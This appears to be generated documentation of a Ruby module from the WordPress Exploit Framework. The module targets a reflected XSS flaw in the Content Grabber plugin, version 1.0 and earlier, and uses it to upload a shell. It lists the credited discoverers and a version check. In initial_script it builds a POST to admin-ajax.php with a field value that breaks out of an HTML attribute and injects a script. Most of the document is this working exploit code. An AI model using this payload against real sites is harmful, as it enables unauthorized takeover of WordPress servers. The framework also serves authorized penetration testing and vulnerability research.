class Wpxf::Exploit::ContentGrabberReflectedXssShellUpload

Public Class Methods

new() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/content_grabber_reflected_xss_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'Content Grabber <= 1.0 Reflected XSS Shell Upload',
    author: [
      'Morten Nørtoft',                     # Discovery and disclosure
      'Kenneth Jepsen',                     # Discovery and disclosure
      'Mikkel Vej',                         # Discovery and disclosure
      'phyushin <phyushin[at]phyubox.com>'  # WPXF module
    ],
    references: [
      ['WPVDB', '8134'],
      ['URL', 'https://packetstormsecurity.com/files/132910/']
    ],
    date: 'Jun 14 2015'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/content_grabber_reflected_xss_shell_upload.rb, line 25
def check
  check_plugin_version_from_readme('content-grabber')
end
initial_script() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/content_grabber_reflected_xss_shell_upload.rb, line 33
def initial_script
  create_basic_post_script(
    vulnerable_url,
    'action'          => 'get_terms_taxonomies',
    'post_type'       => 'post',
    'obj_field_name'  => Utility::Text.rand_alpha(10),
    'obj_field_id'    => "widget-cg_content_grabber-3-cat_id\\\"><script>#{xss_ascii_encoded_include_script}<\\/script>",
    'cat_id_array'    => '[\"1\"]'
  )
end
vulnerable_url() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/content_grabber_reflected_xss_shell_upload.rb, line 29
def vulnerable_url
  normalize_uri(wordpress_url_admin, 'admin-ajax.php')
end